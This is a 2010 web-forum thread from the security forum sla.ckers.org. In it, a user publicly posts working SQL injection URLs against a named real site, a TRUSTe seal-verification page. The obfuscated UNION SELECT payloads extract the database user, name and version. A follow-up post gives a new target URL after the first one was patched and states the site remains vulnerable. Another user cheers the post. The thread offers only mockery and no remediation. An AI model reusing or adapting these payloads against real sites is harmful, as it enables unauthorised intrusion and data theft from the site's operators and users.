Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Truste(dot)com SQli "The Leader in Advancing Online Confidence"
Posted by: VMw4r3
Date: July 19, 2010 02:23PM

Quote from site:
"The Leader in Advancing Online Confidence

Leading brands rely on TRUSTe privacy services to increase the confidence of their site visitors and realize improved leads, conversions and sign-ups."

http://www.truste.com/privacy_seals_and_services/index.html

hxxp://clicktoverify.truste.com/pvr.php?page=validate&url=www.facebook.com&sealid=102/*VMw4r3*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4,5,6,7,8,9,10,11--

Image:
http://img843.imageshack.us/img843/3493/validationpageforonline.png



Edited 2 time(s). Last edit at 07/19/2010 07:05PM by VMw4r3.

Options: ReplyQuote
Re: Truste(dot)com SQli "The Leader in Advancing Online Confidence"
Posted by: m1cr0n
Date: July 23, 2010 09:04AM

;)
Very good!
"The Leader in Advancing Online Confidence"

Make me smile.

Options: ReplyQuote
Re: Truste(dot)com SQli "The Leader in Advancing Online Confidence"
Posted by: VMw4r3
Date: July 23, 2010 12:22PM

lol Click With Confidence



/*update*/

The facebook url above is not vulnerable any more, but site is still vulnerable.

hxxp://clicktoverify.truste.com/pvr.php?page=validate&url=www.free-tax-return.com&sealid=101/*VMw4r3*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4,5,6,7,8,9,10,11--



Edited 2 time(s). Last edit at 08/23/2010 02:43PM by VMw4r3.

Options: ReplyQuote


Sorry, only registered users may post in this forum.